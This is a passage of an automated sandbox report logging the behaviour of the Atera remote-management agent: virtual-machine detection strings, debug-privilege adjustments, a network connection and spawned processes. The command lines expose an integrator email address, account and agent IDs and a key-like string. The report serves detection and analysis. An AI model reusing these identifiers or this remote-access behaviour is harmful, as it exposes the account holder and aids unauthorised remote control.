                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariableNames.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariable.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyUnzip.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyWebFile.ps1
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2276825332.000001E44C4A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                                Source: svchost.exe, 00000027.00000003.2120077652.000001F80901B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 006000C298128B8C02A71A2474AEB5F3DC
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1850146314.00000246BAD19000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2261672439.000001E44C2F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                                Source: svchost.exe, 00000027.00000002.2559101844.000001F808C13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868867797.00000246D3E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceSynchronizes the system time of this virtual machine with the system time of the physical computer.Hyper-V Time Synchronization ServicevmictimesyncStopped
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868717408.00000246D3E79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicvss"
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2467763966.000001327BE92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWw%SystemRoot%\system32\mswsock.dll
                                Source: svchost.exe, 00000027.00000002.2560357680.000001F808CF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *@friendlyname"vmware virtual disk"
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.1449086185.000001E740C47000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1924598534.0000023477C21000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1920033330.0000023477540000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1922183275.0000023477B52000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1831291974.0000022ADA1E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Win32_Service.Name="vmicshutdown"p^G
                                Source: AgentPackageProgramManagement.exe, 00000035.00000002.2257779174.00000213B382A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllssO
                                Source: AgentPackageProgramManagement.exe, 00000035.00000000.1980617476.000002139A632000.00000002.00000001.01000000.0000002B.sdmpBinary or memory string: VMware Tools)Cisco Webex Meetings
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1850146314.00000246BAD19000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2149932355.000001E4332A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2276825332.000001E44C4A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2272394045.000001E44C3A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicvss"k
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: |Provides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.
                                Source: AgentPackageAgentInformation.exe, 00000016.00000002.1583936197.0000026AEAC27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA
                                Source: svchost.exe, 00000027.00000002.2560357680.000001F808CF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .@manufacturer"vmware"
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2272394045.000001E44C3A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicshutdown"6
                                Source: AgentPackageAgentInformation.exe.16.drBinary or memory string: VIRUSfighterAVMware Carbon Black Cloud Sensor7VMware Carbon Black Defense/VMware Carbon Black EDR9VMware Carbon Black Response
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2265505093.000001E44C31C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicshutdownvmicshutdownStopped
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2265505093.000001E44C31C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicheartbeatvmicheartbeatStopped
                                Source: Atera.AgentPackages.CommonLib.dll2.26.drBinary or memory string: vmware
                                Source: svchost.exe, 00000027.00000002.2559534314.000001F808C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JSetPropValue.Manufacturer("VMware");
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1813948689.0000022AC0ADD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "Win32_Service.Name="vmicheartbeat"p^G
                                Source: rundll32.exe, 00000006.00000002.1358090871.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 6VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868216628.00000246D3E31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicvssvmicvssStopped5
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,12G
                                Source: svchost.exe, 00000027.00000002.2558931330.000001F808C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dca-12.0
                                Source: svchost.exe, 00000027.00000002.2561661126.000001F809124000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SPACES_PhysicalDisk{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{3c527940-1853-195e-fb1a-27cdb1f80e4a}6000C298128B8C02A71A2474AEB5F3DCVMware Virtual diskVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicvss"p^G
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1850146314.00000246BAD19000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2261672439.000001E44C2F0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868867797.00000246D3E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.pS#3
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868867797.00000246D3E8F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2261672439.000001E44C2F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to exchange data between the virtual machine and the operating system running on the physical computer.Hyper-V Data Exchange ServicevmickvpexchangeStoppedc
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868717408.00000246D3E79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicshutdown"
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2271850705.000001E44C39E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeate
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                                Source: svchost.exe, 00000027.00000002.2558931330.000001F808C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk6000C298128B8C02A71A2474AEB5F3DC0
                                Source: svchost.exe, 00000027.00000002.2559534314.000001F808C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSetPropValue.FriendlyName("VMware Virtual disk");
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868947160.00000246D3E9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvssr
                                Source: svchost.exe, 00000027.00000002.2560357680.000001F808CF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @"VMware Virtual disk"
                                Source: svchost.exe, 00000027.00000002.2558931330.000001F808C00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 :
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2272394045.000001E44C3A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicheartbeat"
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2451097545.000001327ADB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIE
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1850146314.00000246BAD19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.HV Host ServiceHvHostStoppedl
                                Source: svchost.exe, 00000027.00000002.2560155290.000001F808CA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 006000C298128B8C02A71A2474AEB5F3DCc02
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868867797.00000246D3E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1850146314.00000246BAD19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to exchange data between the virtual machine and the operating system running on the physical computer.Hyper-V Data Exchange ServicevmickvpexchangeStoppedt
                                Source: svchost.exe, 00000027.00000002.2559730729.000001F808C66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@"VMware"Buffer
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                                Source: svchost.exe, 00000005.00000002.2559031344.000002F5BF42B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1506477733.0000000003636000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1585649904.000001FD5A098000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A23A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.1869950008.00000246D3FE8000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000020.00000002.2266637366.000002706E120000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F674000.00000004.00000020.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2567716195.0000024845510000.00000004.00000020.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2120854347.000001CC2B3E0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2134700713.00000165B09C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: AteraAgent.exe, 0000001A.00000002.2376340769.000001A89A23A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}5
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2280586571.000001E44C4B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllGG
                                Source: svchost.exe, 00000027.00000002.2560155290.000001F808CA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1850146314.00000246BAD19000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000002A.00000002.2261672439.000001E44C2F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a platform for communication between the virtual machine and the operating system running on the physical computer.Hyper-V Remote Desktop Virtualization ServicevmicrdvStopped
                                Source: svchost.exe, 00000027.00000002.2560155290.000001F808CA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2149932355.000001E4332A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.HV Host ServiceHvHostStopped
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868867797.00000246D3E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to manage virtual machine with PowerShell via VM session without a virtual network.Hyper-V PowerShell Direct ServicevmicvmsessionStopped
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1812887385.0000022AC0862000.00000002.00000001.01000000.0000001F.sdmp, AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2115830756.0000016597FE2000.00000002.00000001.01000000.00000031.sdmp, Atera.AgentPackages.CommonLib.dll2.26.drBinary or memory string: get_IsVirtualMachine
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868867797.00000246D3E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Hyper-V Guest Service InterfacevmicguestinterfaceStopped
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.1868867797.00000246D3E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2276825332.000001E44C4A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSFT_PhysicalDisk{1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\SPACES_PhysicalDisk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{3c527940-1853-195e-fb1a-27cdb1f80e4a}"6000C298128B8C02A71A2474AEB5F3DCVMware Virtual diskVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: AteraAgent.exe, 0000000E.00000002.1449086185.000001E740BE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp?
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                                Source: svchost.exe, 00000027.00000002.2560357680.000001F808CF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @SetPropValue.Manufacturer("VMware");
                                Source: svchost.exe, 00000027.00000002.2559534314.000001F808C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@SetPropValue.FriendlyName("VMware Virtual disk");
                                Source: AgentPackageAgentInformation.exe, 0000002A.00000002.2170099989.000001E433AF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service
                                Source: AgentPackageMonitoring.exe, 0000003D.00000002.2451097545.000001327ADB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc
                                Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
                                Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB7B4C __crtCaptureCurrentContext,IsDebuggerPresent,__crtUnhandledException,37_2_00007FFB02EB7B4C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EFAFB0 OutputDebugStringA,GetProcessHeap,OutputDebugStringA,GetLastError,lstrlenW,HeapAlloc,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,GetLastError,OutputDebugStringA,GetModuleFileNameW,lstrlenW,OutputDebugStringA,lstrcatW,lstrcatW,lstrcatW,GetFileAttributesW,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,WinVerifyTrust,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,GetCurrentThreadId,GetCurrentProcessId,wsprintfW,GetEnvironmentVariableW,SetEnvironmentVariableW,_errno,_errno,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetLastError,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,HeapFree,_snprintf,OutputDebugStringA,37_2_00007FFB02EFAFB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC1910 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,37_2_00007FFB02EC1910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Process token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Process token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Process token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Process token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe Process token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Process token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe Process token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe Process token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe Process token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBACD4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_00007FFB02EBACD4
                                Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: page read and write | page guard

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.119.152.241 443
                                Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="barrostransportes2018@gmail.com" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000MHGA9IAP" /AgentId="3757c761-9e50-4f15-8086-0e584dceea48"
                                Source: C:\Windows\System32\msiexec.exe Process created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Process created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "c0a02000-d8db-4c72-a990-e7e78fb2c44b" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "08ea1206-2fa8-46b2-a7c8-5fb30d3b6805" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "7cd28163-b1ef-497f-b073-8581f0695073" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "cc07350c-f483-47f0-a322-e5655b4447fa" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "463fd9d0-b270-46be-8e66-442f10d730f6" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000MHGA9IAP
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
